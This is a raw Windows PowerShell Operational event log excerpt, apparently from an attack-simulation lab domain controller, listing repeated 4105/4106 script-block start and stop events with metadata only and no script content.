Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470731
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470730
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470729
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470728
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470727
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470726
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470725
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470724
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470723
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470722
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470721
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470720
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470719
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470718
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470717
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470716
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470715
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470714
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470713
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470712
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470711
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470710
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470709
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470708
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470707
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470706
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470705
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470704
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470703
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470702
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470701
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470700
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470699
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470698
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470697
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470696
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470695
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470694
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470693
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470692
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470691
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470690
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470689
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470688
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470687
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470686
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470685
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470684
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470683
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470682
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470681
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470680
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470679
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470678
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
